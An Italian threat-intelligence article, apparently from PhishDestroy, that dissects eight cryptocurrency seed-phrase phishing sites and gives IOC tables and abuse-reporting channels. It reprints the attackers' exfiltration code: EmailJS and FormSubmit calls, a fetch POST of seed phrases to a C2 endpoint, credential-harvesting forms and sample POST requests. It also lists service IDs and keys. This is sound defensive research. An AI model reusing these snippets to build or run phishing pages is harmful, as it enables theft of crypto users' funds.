Anatomia del phishing nel mondo delle criptovalute:
8 attacchi reali analizzati in dettaglio
Abbiamo intercettato traffico di phishing in tempo reale, effettuato il reverse engineering su 5 programmi per il furto di frasi seed e rintracciato i dati rubati fino a bot di Telegram, account EmailJS e backend di servizi di phishing-as-a-service.

Cosa abbiamo scoperto
Ogni giorno, migliaia di utenti di criptovalute perdono i propri fondi a causa di siti di phishing che sembrano indistinguibili dai servizi di portafoglio legittimi. Ma cosa succede dietro Il falso pulsante “Connect Wallet”? Dove finisce effettivamente la tua frase di seed?
Abbiamo intercettato il traffico HTTP in tempo reale proveniente da 5 siti di phishing attivi, scaricato il loro codice sorgente completo e rintracciato ogni endpoint di esfiltrazione dei dati fino alla sua destinazione finale. Questa indagine svela l'anatomia completa del moderno crypto-phishing: dai trucchi di ingegneria sociale che inducono l'utente a digitare la propria frase seed, al bot di Telegram che la invia all'autore dell'attacco in tempo reale.
Tutte le frasi di seed riportate in questo articolo sono dati di prova generati in modo casuale. Nessuna credenziale reale è stata compromessa nel corso di questa indagine. Tutti i siti sono stati segnalati ai rispettivi provider di hosting e ai reparti preposti alla gestione degli abusi.
Il modello di attacco universale
Nonostante abbiano nomi diversi e sistemi di gestione diversi, tutti e 8 i siti di phishing seguono lo stesso esattamente lo stesso percorso psicologico:
L'osservazione fondamentale: l'animazione "Connessione in corso..." è sempre programmato per fallire. Nel codice sorgente del sito n. 4 abbiamo trovato const success = false — non viene effettuato alcun tentativo di connessione al portafoglio. L'intero flusso serve esclusivamente a indirizzare le vittime verso il modulo “Connetti manualmente”.

Gli 8 siti: analisi dettagliata
Soprosto
Un "protocollo decentralizzato" fittizio per la convalida dei wallet. Utilizza i ticker dei prezzi in tempo reale di CryptoCompare e link a veri blockchain explorer (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano) per garantire credibilità. La pagina di destinazione presenta oltre 100 loghi di wallet e un processo di “convalida” in 3 fasi.
La doppia catena di esfiltrazione
Il backend più sofisticato tra tutti e cinque: ogni credenziale rubata viene inviata tramite due canali indipendenti contemporaneamente:
Victim submits seed phrase
|
+--> Channel 1: axios POST --> Express.js on Render.com
| |
| +--> Telegram Bot API --> @metatech2 (instant DM)
|
+--> Channel 2: fetch POST --> EmailJS API
|
+--> Bestgrace309@gmail.com (email backup) Risultati dell'analisi OSINT
| Indicatore | Valore |
|---|---|
| Email truffaldina | Bestgrace309@gmail.com |
| Bot di Telegram | @DewdropsTG_bot (ID: 7567323692) |
| Destinatario di Telegram | @metatech2 (ID chat: 7350941887) |
| Backend | emailjs-backend-ovtg.onrender.com |
| Servizio EmailJS | service_d5qigxs / template_7bqxeaa |
| Dominio nascosto | layerschain.in (da un'e-mail CF con testo offuscato) |
| Messaggi inviati | 1.824+ (da Telegram, ID messaggio) |
| Età del dominio | 2 giorni (TLS: 25 marzo 2026) |
L'indirizzo e-mail dell'autore dell'attacco è stato trovato in un Commento JavaScript all'interno config.js: // Bestgrace309@gmail.com. Si sono dimenticati di rimuoverlo prima della distribuzione. Inoltre, il backend del relay di Telegram è completamente aperto: nessuna autenticazione, nessuna limitazione di velocità. Decodificando i dati di Cloudflare data-cfemail Oltre all'offuscamento nel codice HTML, abbiamo anche scoperto un indirizzo e-mail nascosto: support@layerschain.in, collegandosi alle infrastrutture di hosting indiane e sudafricane.
Soprosto
Una riproduzione fedelissima della realtà Aqualibre (AQLA) pagina dedicata alla migrazione dei token. Il codice HTML contiene un tag di metadati che ne rivela la fonte: data-scrapbook-source="https://token.aqla.app/migration", con data del 19 novembre 2024.
L'approccio "zero-code"
Questo aggressore richiede nessun codice lato server. Il modulo invia i dati direttamente a Non statico — un backend per moduli legittimo per siti statici. Ogni invio viene inoltrato all'indirizzo e-mail del truffatore. L'indirizzo e-mail dell'autore dell'attacco è non è mai visibile nel codice sorgente.
<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
<textarea name="phrase"></textarea>
<input name="private-key" />
<textarea name="keystore-json"></textarea>
<input name="password" />
</form>
Cloudflare Pages: gratuito. Moduli non statici: gratuiti. Nessun dominio acquistato. Nessun server noleggiato. Costo totale dell'infrastruttura: zero dollari.
Soprosto
Il sottodominio contiene "safpal" — un errore ortografico intenzionale di SafePal, un popolare portafoglio hardware. Il sito si presenta come "Blockchain Wallet Rectification" con 26 categorie di argomenti fasulle. Utilizza Typed.js per animare i nomi delle blockchain (Ethereum, BSC, Polygon...) e un ticker LiveCoinWatch per dare un'impressione di credibilità.
Stesso kit, stesso operatore?
Utilizza il lo stesso identico modello di phishing come sito n. 2:
identico connect.html, identico wallets.html con oltre 60 loghi, lo stesso backend Un-static (ID del modulo diverso — 6f1b82c3...da9943af). Il fatto che il kit sia identico fa fortemente supporre che un unico operatore che gestisce entrambi i siti.
Errori evidenti nel codice: "Privay Policy" (manca la "c"), "seperated" (dovrebbe essere "separated"), "Kestore" (manca la "y"). Il campo password utilizza type="text" anziché type="password".
Soprosto
Un clone quasi perfetto del Flare Network portale — una vera e propria blockchain EVM di livello 1 con i protocolli FTSO e Data Connector. Riproduce oltre 30 partner dell'ecosistema, la navigazione e l'immagine del marchio. Favicon caricate da un sito typosquat: portal.flaremainet.com (manca una "n" in "mainnet").
Doppia ridondanza di EmailJS
L'unico sito che utilizza due account EmailJS distinti contemporaneamente per garantire la ridondanza contro le rimozioni:
// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4
// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
data: { service_id: 'service_isy47de',
template_id: 'template_dkk4d1b',
user_id: 'JsVEgXVcaSTro1etu' }
}) Oggetto dell'e-mail per ogni furto: "New Wallet Details from Flare".
Il codice HTML contiene Google Tag Manager (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Protezione PPC di Lunio, e un Pixel pubblicitario di Twitter/X. L'autore dell'attacco sta eseguendo pubblicità a pagamento per indirizzare le vittime verso il sito di phishing e filtrare i clic generati dai bot. Non si tratta di un hobby: è un'operazione finanziata, con analisi dei dati e investimenti pubblicitari.

Soprosto
Un servizio generico denominato "COIN NODE" / "Wallet Fix" (senza marchio specifico). Copyright "Wallet Fix 2022" — questo modello di kit risale ad almeno 4 anni fa. Immagini ospitate su pumpeth.com (WordPress su AWS).
Phishing-as-a-Service
L'architettura backend più preoccupante: una API multi-tenant basata su UUID:
POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data
wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+... A ogni truffatore viene assegnato un endpoint UUID dedicato. Un operatore centrale gestisce l'API, monitora le campagne e, potenzialmente, trattiene una percentuale dei fondi sottratti. Questo è furti di criptovalute su larga scala — un modello di “phishing-as-a-service”.
Infrastrutture correlate (per lo più inattive)
| Dominio | Ruolo | Stato |
|---|---|---|
| api.pulseresolve.com | API di esfiltrazione | NXDOMAIN |
| walletissuesfix.net | Host della favicon | NXDOMAIN |
| syncwallet.online | Logo host | NXDOMAIN |
| pumpeth.com | CDN per immagini | In tempo reale (AWS) |
Il backend non funziona più, ma il Il frontend è ancora attivo su Cloudflare Pages. Se l'autore dell'attacco effettua una nuova registrazione pulseresolve.com, il sito torna immediatamente operativo.
Soprosto
A operazione su due fronti: un "Centro assistenza" generico all'indirizzo wallet-support-39n.pages.dev con 15 categorie di banconote false e 39 marche di portafogli, oltre a un Clone della procedura di registrazione su Ledger con riproduzione perfetta al pixel alle ledger-recovery.support ospitato su Replit — completo di selezione del modello del dispositivo, configurazione del PIN e una griglia con la frase seed di 24 parole con autocompletamento BIP39 reale.
Backend C2 anti-scanner
La pagina di assistenza del portafoglio invia i dati rubati a api.uranustoken.org/log — un C2 personalizzato basato su nginx/Ubuntu dietro Cloudflare. Il backend elimina intenzionalmente tutte le richieste GET (restituisce un errore 522 per timeout), rispondendo solo alle richieste POST. Ciò significa che gli scanner di URL, i crawler di Google Safe Browsing e i ricercatori di sicurezza che inviano richieste GET all'endpoint non rilevano nulla: il C2 sembra inattivo.
// config.js — C2 config exposed in plaintext
const config = {
serverURL: "https://api.uranustoken.org",
allowedWallets: ["phantom","solfare","metamask","trustwallet",
"coinbasewallet","ledger","trezor","okx","sui","backpack",
"tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;
// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
fetch(serverURL + "/log", {
method: "POST",
headers: {"Content-Type": "application/json"},
body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
})
} Il clone di Ledger esegue un backend Express.js separato direttamente su Replit: POST /api/recovery-phrase raccolta {deviceId, pin, phrase}. Restituisce 400 {"error":"Invalid data provided"} in caso di input non valido — a conferma che il backend è in tempo reale e con verifica attiva dati rubati.
Risultati dell'analisi OSINT
| Indicatore | Valore |
|---|---|
| Frontend (portafoglio) | wallet-support-39n.pages.dev |
| Frontend (Ledger) | ledger-recovery.support (34.111.179.208) |
| Backend C2 | api.uranustoken.org → nginx/1.24.0 Ubuntu |
| Indirizzi IP C2 | 104.21.60.163 / 172.67.198.35 (Cloudflare) |
| Replit Verify | a43d3852-5304-47af-a61b-f0f6f3912736 |
| Segreteria | Name.com (ledger-recovery.support) |
| Implementato | 9 gennaio 2026 (intestazione "Last-Modified") |
| Stack tecnologico | React + Vite + Tailwind v4.1 + Framer Motion |
Il pacchetto JS da 466 KB contiene il elenco completo delle parole BIP39 per il completamento automatico in tempo reale, 67 riferimenti a "passphrase" e 39 a "mnemonic". Il clone di Ledger guida le vittime attraverso lo stesso identico flusso di registrazione di un vero dispositivo Ledger: la pagina di phishing più convincente di tutta questa indagine. Il apiKey Il campo nella configurazione suggerisce un Architettura PhaaS multi-tenant.
Soprosto
Una piattaforma generica di "lancio decentralizzato" con 21 categorie di esche (Staking, migrazione, KYC, omaggi, riscossione dei premi, recupero degli asset, prevendita, conio di NFT, account bloccati...) e Oltre 70 marchi di portafogli — una delle liste di portafogli più complete che abbiamo trovato. L’errore ortografico rivelatore “Sychronize” (manca la “n”) ne smaschera la falsità.
La pipeline FormSubmit
Usi FormSubmit.co — un servizio legittimo di invio di moduli via e-mail. L'hash dell'endpoint a2cf4131f1a5d39453c7c183df96f86f è l'MD5 dell'indirizzo e-mail del truffatore. Abbiamo effettuato attacchi di forza bruta su centinaia di modelli di indirizzi e-mail su Gmail, Yahoo, Hotmail, ProtonMail, Yandex e Mail.ru — nessuna corrispondenza. Il truffatore utilizza un indirizzo e-mail poco comune o generato casualmente.
// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
method: "POST",
dataType: "JSON",
data: {
dappWord: seedPhrase, // THE STOLEN SEED PHRASE
dappName: walletName, // Which wallet was selected
linkName: "DAPP DECENTRALIZED" // Campaign identifier
}
}); Risultati dell'analisi OSINT
| Indicatore | Valore |
|---|---|
| Dominio | mainnetvalidationapp.pages.dev |
| Hash di FormSubmit | a2cf4131f1a5d39453c7c183df96f86f |
| ID campagna | DAPP DECENTRALIZZATO |
| Kit FontAwesome | bdc3291137 (kit n. 112310842, versione gratuita v6.7.2) |
| jQuery | 3.2.1 + 3.5.1 caricati contemporaneamente |
| Bootstrap | CSS 5.2.2 + JS 5.3.0-alpha1 (incompatibilità) |
Kit FontAwesome bdc3291137 — FontAwesome è in grado di identificare il titolare dell'account associato a questo ID kit. Il tag della campagna DAPP DECENTRALIZED potrebbe comparire su altri siti di phishing che utilizzano lo stesso hash di FormSubmit. Dopo aver rubato la frase di seed, un codice QR falso e codice di riferimento casuale di 7 caratteri viene visualizzato il messaggio: "Contatta l'amministratore indicando il tuo codice di riferimento univoco" — lasciando le vittime in attesa invece di avviare un'indagine.
Soprosto
Sconosciuto — sia il frontend che il backend sono offline. In base alla struttura del payload, si trattava di un programma per il furto della frase seed di un portafoglio crittografico. Il Bucket pubblico di Cloudflare R2 (archiviazione a oggetti, non Pages) è un vettore di phishing ben documentato con oltre 5.000 pagine dannose individuate e un aumento del traffico di 61 volte segnalato da Netskope.
La configurazione dello “script kiddie”
Il più operazione primitiva in questa raccolta. Le frasi seme vengono inviate parola per parola a uno script PHP in esecuzione su un computer di casa o su un VPS collegato a un servizio DNS dinamico gratuito:
POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded
pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
+%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
+%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
+%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access Risultati dell'analisi OSINT
| Indicatore | Valore |
|---|---|
| Frontend | pub-519769e9eb634616b1746c2018641d56.r2.dev [OFFLINE] |
| Backend | mercifuljigga4real123.publicvm.com [NXDOMAIN] |
| ID del secchio R2 | 519769e9eb634616b1746c2018641d56 |
| Provider DDNS | DNSExit.com / Netdorm, Inc. (Cincinnati, Ohio) |
| DNS NS | ns10–13.dnsexit.com |
| Nome utente | mercifuljigga4real123 |
"Merciful" + "jigga" (il soprannome di Jay-Z) + "4real" + "123" — un nickname decisamente personale che suggerisce un'affinità con la cultura hip-hop. Non trovato su qualsiasi piattaforma indicizzata: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch o Steam. Probabilmente attivo su Discord, Telegram o piattaforme di gioco con questo nome o varianti simili. Il nome del file fuc.php si abbina perfettamente allo stile irriverente del manico.
7 modi per rubarti la frase di seed

| Metodo | Siti | Come funziona | Velocità | Costo |
|---|---|---|---|---|
| Bot di Telegram | #1 | Express.js su Render.com funge da proxy per l'API di Bot. Il truffatore riceve immediatamente un messaggio diretto con le credenziali. | In tempo reale | $0 |
| EmailJS | #1, #4 | Il JavaScript lato client invia i dati direttamente all’API di EmailJS, che a sua volta li inoltra all’indirizzo e-mail del truffatore. | ~1 min | $0 |
| Moduli non statici | #2, #3 | Modulo HTML standard con metodo POST indirizzato a un servizio di gestione moduli legittimo che inoltra i dati inviati tramite e-mail. | ~1 min | $0 |
| FormSubmit.co | #7 | jQuery AJAX a FormSubmit.co. Indirizzo e-mail nascosto dietro un hash MD5. Campagna contrassegnata con il tag "DAPP DECENTRALIZED". | ~1 min | $0 |
| API C2 personalizzata | #6 | L'applicazione React SPA invia le richieste all'API nginx/Express tramite Cloudflare. Elimina le richieste GET (522) per eludere gli scanner. Risponde solo ai comandi POST. | In tempo reale | circa 5 $ al mese |
| PHP + DDNS | #8 | Script PHP su un computer di casa tramite un servizio DNS dinamico gratuito (publicvm.com). Frase di seed inviata parola per parola. | In tempo reale | $0 |
| API PhaaS | #5 | API multi-tenant basata su UUID. Un operatore centrale gestisce il backend, mentre i truffatori affittano gli endpoint. | In tempo reale | Sconosciuto |
7 segnali di allarme che smascherano ogni sito di phishing
Se vedi qualsiasi In questi casi, chiudi immediatamente la scheda:
Le connessioni reali al portafoglio utilizzano il protocollo WalletConnect o le estensioni del browser. Non visualizzano mai un errore del tipo "Connessione fallita" che richiede di digitare la frase di seed.
Ogni icona del portafoglio rimanda allo stesso modulo. Un servizio vero e proprio integrerebbe l'SDK specifico di ciascun portafoglio.
Il falso "Errore 503" o "Errore sconosciuto" che compare dopo l'invio è intenzionale. I tuoi dati sono già stati rubati: l'errore ti induce a riprovare con un altro portafoglio.
Tutti e 5 i siti abusano del piano gratuito di Cloudflare Pages. Non è richiesta alcuna verifica dell'identità. Nel 2025 gli abusi legati al phishing su Cloudflare Pages sono aumentati del 198%.
Nessun servizio legittimo richiede tutti e tre i tipi di credenziali. Questo modulo a tre schede è una caratteristica tipica dei kit di phishing.
Nessuno di questi siti si carica ethers.js, web3.js, né effettuano chiamate RPC. Sono semplici moduli HTML che fingono di essere dApp.
Hosting gratuito + servizi di moduli gratuiti + messaggistica gratuita = un'operazione di phishing completa a costo zero. Se il sito non ha un dominio vero e proprio, diffidate.
Tabella completa dell'IOC
Per i team di sicurezza, le piattaforme di intelligence sulle minacce e chi segnala abusi:
Domini e infrastruttura
| Dominio | Tipo | Stato |
|---|---|---|
| networklayers.pages.dev | Interfaccia di phishing | In diretta |
| token-aqla.pages.dev | Interfaccia di phishing | In diretta |
| antiresolve-mysafpalnode.pages.dev | Interfaccia di phishing | In diretta |
| flaremainnet.pages.dev | Interfaccia di phishing | In diretta |
| swiftauthapps.pages.dev | Interfaccia di phishing | In diretta |
| emailjs-backend-ovtg.onrender.com | Backend del relè TG | In diretta |
| portal.flaremainet.com | Risorse relative al typosquatting | Sconosciuto |
| layerschain.in | Dominio correlato | DNS non funzionante |
| api.pulseresolve.com | Backend PhaaS | NXDOMAIN |
| walletissuesfix.net | Host delle risorse | NXDOMAIN |
| syncwallet.online | Logo host | NXDOMAIN |
| pumpeth.com | CDN per immagini | In tempo reale (AWS) |
| wallet-support-39n.pages.dev | Interfaccia di phishing | In diretta |
| ledger-recovery.support | Phishing su Ledger (Replit) | In diretta |
| api.uranustoken.org | Backend C2 (nginx/Ubuntu) | In diretta |
| uranustoken.org | Dominio principale | 404 |
| mainnetvalidationapp.pages.dev | Interfaccia di phishing | In diretta |
| pub-519769e9eb634616b1746c2018641d56.r2.dev | Phishing (categoria R2) | Non connesso |
| mercifuljigga4real123.publicvm.com | Backend PHP (DDNS) | NXDOMAIN |
Account e identificativi
| Tipo | Valore | Sito |
|---|---|---|
| Bestgrace309@gmail.com | #1 | |
| E-mail (nascosta) | support@layerschain.in | #1 |
| Bot di Telegram | @DewdropsTG_bot (7567323692) | #1 |
| Utente di Telegram | @metatech2 (7350941887) | #1 |
| EmailJS n. 1 | service_d5qigxs / I-7q0Bs-ilK3rFcWj | #1 |
| EmailJS n. 2 | service_6dt5h1k / Sza6lhzA9hKHrm1k4 | #4 |
| EmailJS n. 3 | service_isy47de / JsVEgXVcaSTro1etu | #4 |
| Modulo non statico | c78173e2d991...94c3f76 | #2 |
| Modulo non statico | 6f1b82c3ce55...da9943af | #3 |
| UUID PhaaS | a26db20c-1dc4-4208-a60a-c2c3b22c02ef | #5 |
| GTM | GTM-WX2D2TR | #4 |
| MS Clarity | j4bllybjkp | #4 |
| Istanza di rendering | rndr-id: ed83576e-b1b3-4c82 | #1 |
| Replit Verify | a43d3852-5304-47af-a61b-f0f6f3912736 | #6 |
| MD5 di FormSubmit | a2cf4131f1a5d39453c7c183df96f86f | #7 |
| Tag della campagna | DAPP DECENTRALIZZATO | #7 |
| Kit FontAwesome | bdc3291137 (kit n. 112310842) | #7 |
| ID del secchio R2 | 519769e9eb634616b1746c2018641d56 | #8 |
| Nome utente/DDNS | mercifuljigga4real123 | #8 |
Dove segnalare i tentativi di phishing legati alle criptovalute

| Servizio | Cosa segnalare | Come |
|---|---|---|
| Cloudflare | 7 bucket .pages.dev + 1 bucket R2 | abuse.cloudflare.com |
| Google Safe Browsing | Tutti gli URL di phishing | Segnala un tentativo di phishing |
| PhishTank | Tutti gli URL della lista nera della community | phishtank.org |
| EmailJS | 3 account oggetto di abuso (ID di servizio sopra indicati) | abuse@emailjs.com |
| Non statico | 2 endpoint di forma | Contattaci tramite un-static.com |
| Render.com | Backend di inoltro di Telegram | Modulo per segnalare abusi |
| Telegram | @DewdropsTG_bot + @metatech2 | telegram.org/support |
| Google (Gmail) | Bestgrace309@gmail.com | Segnalazione di abuso a Google |
| Twitter/X | Account pubblicitario per la promozione del sito n. 4 | Segnala abuso relativo agli annunci X |
| FormSubmit.co | Hash a2cf4131... (#7) | Modulo di segnalazione di abusi FormSubmit |
| Replit | ledger-recovery.support (#6) | Segnalazione di abuso su Replit |
| Name.com | Responsabile del registro per ledger-recovery.support | Abusi su Name.com |
| DNSExit | mercifuljigga4real123.publicvm.com | Abusi su dnsexit.com |
| FontAwesome | Kit bdc3291137 (n. 7) | Uso improprio di FontAwesome |
| Chainabuse | Tutte le campagne di phishing | Chainabuse.com |
Come proteggersi
Nessun servizio affidabile ti chiederà mai di digitare la tua frase di seed su un sito web. Le frasi di seed vanno inserite esclusivamente nel software ufficiale del portafoglio durante la procedura di ripristino del portafoglio — mai su siti web di terze parti dedicati alla "convalida", alla "sincronizzazione" o al "ripristino".
Prima di collegare qualsiasi portafoglio:
- Verifica che l'URL corrisponda al dominio ufficiale. Controlla i dettagli del certificato SSL.
- Real WalletConnect utilizza un codice QR o un deep link — mai un modulo con la frase seed.
- Se la "connessione non va a buon fine" e ti viene chiesto di inserire manualmente le credenziali, si tratta di phishing.
- Verifica gli URL sospetti su PhishTank oppure VirusTotal prima di interagire.
- Utilizza un portafoglio hardware: richiede una conferma fisica per ogni transazione.
- Aggiungi agli preferiti gli URL ufficiali. Non cliccare mai sui link presenti negli annunci, nei messaggi diretti o sui social media.
La tassonomia del crypto-phishing
I ladri di frasi seed rappresentano solo una delle categorie. Ecco il quadro completo del phishing nel mondo delle criptovalute: aggiungeremo approfondimenti su ciascuna tipologia.
La scomoda verità
I costi per l'organizzazione di un'operazione di phishing nel settore delle criptovalute $0 e richiede meno di 30 minuti. Hosting gratuito, servizi di moduli gratuiti, bot di messaggistica gratuiti. L'autore dell'attacco a Sito n. 1 ha già raccolto le credenziali da Oltre 1.824 vittime. Il sito n. 4 è in funzione pubblicità a pagamento su larga scala. Non si tratta di dilettantismo: è un vero e proprio settore. L'unica difesa è la consapevolezza.
Aiutaci a reagire
PhishDestroy monitora e segnala in tempo reale i siti di phishing legati alle criptovalute. Se ti sei imbattuto in un sito sospetto, segnalacelo: lo esamineremo e faremo il possibile per farlo rimuovere.



